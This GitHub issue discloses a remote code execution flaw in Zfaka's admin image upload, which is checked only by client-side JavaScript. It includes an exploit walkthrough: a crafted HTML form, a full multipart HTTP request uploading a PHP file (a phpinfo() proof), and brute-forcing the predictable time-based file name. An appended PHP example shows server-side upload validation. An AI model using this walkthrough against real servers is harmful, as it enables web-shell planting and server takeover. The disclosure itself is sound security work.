Zfaka Backend RCE(All version) #260

Open
J0o1ey opened this issue Jan 31, 2022 · 2 comments

Comments


J0o1ey commented Jan 31, 2022

In the background file upload, Zfaka has only one JS check, in \public\res\layui\lay\modules\upload.js.

There is no filtering of the file extension, and there is only this one front-end JS verification, so disabling JS can directly achieve background RCE.

image-20210526205833957

The upload controller in the background is located in \application\modules\Admin\controllers\Products.php.

The upload path is not returned after the file is uploaded, but we already know the upload path and the naming rules of the uploaded file.

image-20210526204139761

UPLOAD_PATH is defined as follows:

define('UPLOAD_PATH', APP_PATH.'/public/res/upload/');

CUR_DATE is defined as follows:

define('CUR_DATE', date('Y-m-d'));

File name:

$filename = date("His"); // hour + minute + second

Taking 21:05 as an example, the output is as follows:

image-20210526210650296

Take 21:05:44 on May 26, 2021 as an example.

The full file path is:

http://www.xxx.com/res/upload/2021-05-26/210444.php

Construct the form directly:

<meta charset="utf-8">
<form action="http://xxx.top/Admin/products/imgurlajax" method="post" enctype="multipart/form-data">
<label for="file">File:</label>
<input type="file" name="file" id="file" />
<input type="text" name="pid" id="pid" /> <!-- Remember to set the pid to the ID of the product (you can get it by capturing the packet when selecting the product in the background) -->
<input type="submit" value="Upload" />
</form>

At the same time, you need to add the Referer header http://xxx.top/Admin/products/imgurl/?id=1 , and modify the

Otherwise, "please select product ID" will be prompted.

Finally, the complete upload HTTP request is as follows:

POST http://xxx.top/Admin/products/imgurlajax HTTP/1.1
Host: xxxx
Content-Length: 291
Accept: application/json, text/javascript, */*;q=0.01
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeSrhtSPGxub0H0eb
Origin: http://47.105.132.207
Referer: http://xxx.top/Admin/products/imgurl/?id=12
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=ql4ep5uk8cf9i0rvihrruuilaq
Connection: close

------WebKitFormBoundaryeSrhtSPGxub0H0eb
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php
phpinfo();
------WebKitFormBoundaryeSrhtSPGxub0H0eb
Content-Disposition: form-data; name="pid"

12
------WebKitFormBoundaryeSrhtSPGxub0H0eb--

The direct upload succeeded.

Then iterate over the last seconds with Burp Suite Intruder.

After all, the number of seconds can't be that accurate.

image-20210526212753095

image-20210526233749316
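As an added example from the defender's side (not Zfaka's own code), this is the server-side validation the imgurlajax handler described above lacks: an extension allowlist, a content check independent of the client's Content-Type, and an unpredictable file name in place of date("His"). The function name, the ALLOWED_IMAGE_TYPES constant and the call site are assumptions.

```php
<?php
declare(strict_types=1);
// Added example, not Zfaka's own code. Names below are assumed.
// Allowlist: permitted extension => MIME type the bytes must actually have.
const ALLOWED_IMAGE_TYPES = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
];

/**
 * Validate one $_FILES entry and store it under a random name in $destDir.
 * Returns the stored file name; throws on any failure.
 */
function validate_image_upload(array $file, string $destDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('no valid upload');
    }

    // 1. Server-side extension allowlist: the only check in the original is
    //    the client-side JS in upload.js, which a browser can simply skip.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED_IMAGE_TYPES[$ext])) {
        throw new RuntimeException('extension not allowed');
    }

    // 2. Inspect the bytes; the client's Content-Type (image/png in the
    //    request above) is attacker-controlled and proves nothing.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED_IMAGE_TYPES[$ext] || getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('content is not a valid image');
    }

    // 3. Unpredictable name instead of date("His"), and an extension taken
    //    from the allowlist rather than from the client.
    $name   = bin2hex(random_bytes(16)) . '.' . $ext;
    $target = rtrim($destDir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        throw new RuntimeException('could not store file');
    }
    chmod($target, 0644);
    return $name;
}
// In the controller (assumed call site): verify the product id server-side and
// use a CSRF token; a Referer check alone does not authenticate the request.
// $stored = validate_image_upload($_FILES['file'], UPLOAD_PATH . CUR_DATE);
```

Pair this with a web server rule that refuses to execute scripts under res/upload, so that even a polyglot image that passes these checks cannot run as PHP.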

@GXLiLuoQin

Use PHP7.2+


danel8 commented Feb 24, 2022

thanks you are so nice

